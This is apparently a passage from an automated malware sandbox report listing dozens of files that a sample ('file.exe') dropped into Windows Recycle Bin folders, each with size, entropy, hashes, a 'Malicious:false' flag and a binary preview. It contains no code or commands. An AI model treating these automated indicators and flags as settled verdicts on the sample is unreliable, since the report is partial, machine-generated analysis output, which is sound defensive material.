                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\PPPPPPPPPPPP (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\QQQQQQQQQQQ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\QQQQQQQQQQQQ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\RRRRRRRRRRR (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\RRRRRRRRRRRR (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\SSSSSSSSSSS (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\SSSSSSSSSSSS (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\TTTTTTTTTTT (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\TTTTTTTTTTTT (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\UUUUUUUUUUU (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\UUUUUUUUUUUU (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\VVVVVVVVVVV (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\VVVVVVVVVVVV (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\WWWWWWWWWWW (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\WWWWWWWWWWWW (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\XXXXXXXXXXX (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\XXXXXXXXXXXX (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\YYYYYYYYYYY (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\YYYYYYYYYYYY (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\ZZZZZZZZZZZ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\ZZZZZZZZZZZZ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\desktop.ini

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
                SSDEEP:3:QfEtnkLepwwN/lfn3lHvcZlHVUJANitKZgaL3HZ5PvkZYThDn:QfRLeptX+xeANitKZgaL3DksV
                MD5:E3601CC9EA6036B26E442C02E3C43FF8
                SHA1:C2928066C9651651632F7DDF0BCF1E3E052F6FA0
                SHA-256:A8B49CBC3F5F7DE6DADB40D7925876A952D0A32DDAE705F4BBFCD7B6150A2880
                SHA-512:736D1D2F32D987B7A754324D1E68A017D2B52023759C63FCD56D2F9D9E3D05C2975403FC74440DDA4B7D76C3FA69F49D424C5A87BA0D74CE360CFC1583306B83
                Malicious:false
                Preview:.l%_a..=i..T%.(&>..{^.;...q.U.x..f........g.Z....@CT]..>.....u~?...O4.p.I.'%RLz.1H>k..../....J."..o.}.x.../...z..1|g....6.f

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\AAAAAAAAAAA (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\BBBBBBBBBBB (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\CCCCCCCCCCC (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\DDDDDDDDDDD (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\EEEEEEEEEEE (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\FFFFFFFFFFF (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\GGGGGGGGGGG (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
